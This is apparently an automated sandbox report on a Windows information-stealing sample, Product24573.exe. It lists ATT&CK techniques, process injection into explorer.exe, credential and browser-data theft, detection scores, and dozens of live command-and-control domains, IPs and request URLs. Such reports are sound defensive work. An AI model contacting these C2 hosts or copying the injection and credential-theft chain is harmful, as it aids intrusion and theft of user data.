          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object Model1
          Data from Local System          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items12
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 878554 Sample: Product24573.exe Startdate: 30/05/2023 Architecture: WINDOWS Score: 100 32 www.gomarketing.info 2->32 36 Snort IDS alert for network traffic 2->36 38 Multi AV Scanner detection for domain / URL 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 6 other signatures 2->42 9 Product24573.exe 3 2->9         started        signatures3 process4 file5 24 C:\Users\user\...\Product24573.exe.log, ASCII 9->24 dropped 12 Product24573.exe 9->12         started        15 Product24573.exe 9->15         started        process6 signatures7 52 Modifies the context of a thread in another process (thread injection) 12->52 54 Maps a DLL or memory area into another process 12->54 56 Sample uses process hollowing technique 12->56 58 Queues an APC in another process (thread injection) 12->58 17 explorer.exe 1 12->17 injected process8 dnsIp9 26 www.berlinhealthweek.com 130.185.109.77, 49700, 80 XIRRADE Germany 17->26 28 musicandgros.com 81.169.145.93, 49701, 49702, 49703 STRATOSTRATOAGDE Germany 17->28 30 2 other IPs or domains 17->30 34 System process connects to network (likely due to code injection or exploit) 17->34 21 wlanext.exe 13 17->21         started        signatures10 process11 signatures12 44 Tries to steal Mail credentials (via file / registry access) 21->44 46 Tries to harvest and steal browser information (history, passwords, etc) 21->46 48 Deletes itself after installation 21->48 50 2 other signatures 21->50

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Product24573.exe38%ReversingLabsWin32.Trojan.Pwsx
          Product24573.exe54%VirustotalBrowse
          Product24573.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.berlinhealthweek.com1%VirustotalBrowse
          www.gomarketing.info8%VirustotalBrowse
          www.musicandgros.com10%VirustotalBrowse
          musicandgros.com8%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fontbureau.coml10%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/90%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp//icq0%Avira URL Cloudsafe
          http://www.antalyabfe.com/bpg5/www.antalyabfe.comti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.vns96.net/bpg5/www.vns96.netti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.rt66omm.com/bpg5/www.rt66omm.comti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/U0%URL Reputationsafe
          http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Sue0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.haynicorpon.biz100%Avira URL Cloudmalware
          http://www.perkibeans.com/bpg5/0%Avira URL Cloudsafe
          http://www.thetowerbells.com/bpg5/100%Avira URL Cloudmalware
          http://www.wearecatalyst.app/bpg5/100%Avira URL Cloudmalware
          http://www.mysparexrewards.com100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/j0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/c0%URL Reputationsafe
          http://www.rt66omm.com0%Avira URL Cloudsafe
          http://www.carterandcone.comre0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
          http://www.carterandcone.comams0%URL Reputationsafe
          http://www.antalyabfe.com/bpg5/100%Avira URL Cloudmalware
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.gomarketing.info100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cnr-t0%URL Reputationsafe
          http://www.perkibeans.com0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/N0%URL Reputationsafe
          http://www.42230.org/bpg5/www.42230.orgti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0a0%URL Reputationsafe
          http://www.founder.com.cn/cnh0%URL Reputationsafe
          http://www.carterandcone.comsig$E0%Avira URL Cloudsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://en.wikip0%URL Reputationsafe
          http://www.vns96.net0%Avira URL Cloudsafe
          http://www.gomarketing.info/bpg5/www.gomarketing.infoti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.haynicorpon.biz/bpg5/100%Avira URL Cloudmalware
          http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.thetowerbells.com0%Avira URL Cloudsafe
          http://www.gomarketing.info/bpg5/100%Avira URL Cloudmalware
          http://www.mysparexrewards.com/bpg5/100%Avira URL Cloudmalware
          http://www.berlinhealthweek.com/bpg5/100%Avira URL Cloudmalware
          http://www.jhg61.com0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnl-gIU0%Avira URL Cloudsafe
          http://www.bisarropainting.comAD0%Avira URL Cloudsafe
          http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.42230.orgI0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/it0%Avira URL Cloudsafe
          http://www.fabricadepack.fun/bpg5/www.fabricadepack.funti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.rt66omm.com/bpg5/100%Avira URL Cloudmalware
          http://www.berlinhealthweek.com100%Avira URL Cloudmalware
          http://www.thetowerbells.com/bpg5/www.thetowerbells.comti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.bisarropainting.com0%Avira URL Cloudsafe
          http://www.techwithsun.com/bpg5/100%Avira URL Cloudmalware
          http://www.antalyabfe.com0%Avira URL Cloudsafe
          http://www.jhg61.com/bpg5/100%Avira URL Cloudmalware
          http://www.fontbureau.come.com90%Avira URL Cloudsafe
          http://www.techwithsun.com100%Avira URL Cloudmalware
          http://www.perkibeans.com/bpg5/www.perkibeans.comti-8=LyKdFPBKAe5W0%Avira URL Cloudsafe
          http://www.bisarropainting.com/bpg5/www.bisarropainting.comti-8=LyKdFPBKAe5W0%Avira URL Cloudsafe
          http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.fabricadepack.fun0%Avira URL Cloudsafe
          http://www.vns96.net/bpg5/100%Avira URL Cloudmalware
          http://www.wearecatalyst.app0%Avira URL Cloudsafe
          http://www.musicandgros.com100%Avira URL Cloudmalware
          http://www.techwithsun.com/bpg5/www.techwithsun.com9100%Avira URL Cloudmalware
          http://www.perkibeans.com)B0%Avira URL Cloudsafe
          http://www.fabricadepack.fun/bpg5/100%Avira URL Cloudmalware
          http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.jhg61.com/bpg5/www.jhg61.comti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.42230.org100%Avira URL Cloudmalware
          http://www.musicandgros.com/bpg5/?5eb6=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTE0i/pYvsbACINg==&ti-8=LyKdFPBKAe5W100%Avira URL Cloudmalware
          http://www.berlinhealthweek.com/bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.berlinhealthweek.com
          		130.185.109.77
          		truetrueunknown
          www.gomarketing.info
          		198.177.124.57
          		truetrueunknown
          musicandgros.com
          		81.169.145.93
          		truetrueunknown
          www.musicandgros.com
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://www.musicandgros.com/bpg5/?5eb6=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTE0i/pYvsbACINg==&ti-8=LyKdFPBKAe5Wtrue
          • Avira URL Cloud: malware
          		unknown
          http://www.berlinhealthweek.com/bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==true
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://duckduckgo.com/chrome_newtabwlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drfalse
            		high
            http://www.perkibeans.com/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://duckduckgo.com/ac/?q=-15B7L5MNM.6.drfalse
              		high
              http://www.vns96.net/bpg5/www.vns96.netti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              http://www.wearecatalyst.app/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              http://www.antalyabfe.com/bpg5/www.antalyabfe.comti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              http://www.fontbureau.com/designersProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.jiyu-kobo.co.jp//icqProduct24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.thetowerbells.com/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.rt66omm.com/bpg5/www.rt66omm.comti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.haynicorpon.bizexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.mysparexrewards.comexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.fontbureau.coml1Product24573.exe, 00000000.00000003.398796962.0000000005BA0000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.394424226.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.rt66omm.comexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.antalyabfe.com/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.gomarketing.infoexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.sajatypeworks.comProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.jiyu-kobo.co.jp/9Product24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.founder.com.cn/cn/cTheProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.perkibeans.comexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.42230.org/bpg5/www.42230.orgti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.carterandcone.comsig$EProduct24573.exe, 00000000.00000003.385428851.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://www.gomarketing.info/bpg5/www.gomarketing.infoti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.vns96.netexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.galapagosdesign.com/DPleaseProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.urwpp.deDPleaseProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.gomarketing.info/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.zhongyicts.com.cnProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.haynicorpon.biz/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.thetowerbells.comexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.jiyu-kobo.co.jp/UProduct24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.mysparexrewards.com/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.jhg61.comexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.berlinhealthweek.com/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.founder.com.cn/cn/itProduct24573.exe, 00000000.00000003.385178049.0000000005BAC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000003.00000002.670378936.00007FFC1B439000.00000002.00000001.01000000.0000000A.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.bisarropainting.comADexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-15B7L5MNM.6.drfalse
                  		high
                  http://www.42230.orgIexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fabricadepack.fun/bpg5/www.fabricadepack.funti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=wlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drfalse
                    		high
                    http://www.jiyu-kobo.co.jp/SueProduct24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.carterandcone.comlProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cnl-gIUProduct24573.exe, 00000000.00000003.385033767.0000000005BAC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.rt66omm.com/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.berlinhealthweek.comexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.thetowerbells.com/bpg5/www.thetowerbells.comti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.fontbureau.com/designers/frere-jones.htmlProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.jiyu-kobo.co.jp/jProduct24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.jiyu-kobo.co.jp/cProduct24573.exe, 00000000.00000003.385985075.0000000005BA7000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.bisarropainting.comexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.techwithsun.com/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.fontbureau.com/designersGProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.carterandcone.comreProduct24573.exe, 00000000.00000003.385428851.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/?Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?Product24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000003.00000002.670378936.00007FFC1B439000.00000002.00000001.01000000.0000000A.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comamsProduct24573.exe, 00000000.00000003.385428851.0000000005BA3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://search.yahoo.com?fr=crmas_sfpfwlanext.exe, 00000006.00000002.649740499.0000000000606000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.6.drfalse
                              		high
                              http://www.tiro.comProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.antalyabfe.comexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.jhg61.com/bpg5/explorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.bisarropainting.com/bpg5/www.bisarropainting.comti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.goodfont.co.krProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.techwithsun.comexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.typography.netDProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comProduct24573.exe, 00000000.00000002.404786526.0000000007342000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.perkibeans.com/bpg5/www.perkibeans.comti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comti-8=LyKdFPBKAe5Wexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.founder.com.cn/cnr-tProduct24573.exe, 00000000.00000003.385033767.0000000005BAC000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/jp/NProduct24573.exe, 00000000.00000003.385896469.0000000005BA7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fabricadepack.funexplorer.exe, 00000003.00000002.661258421.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.572381737.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
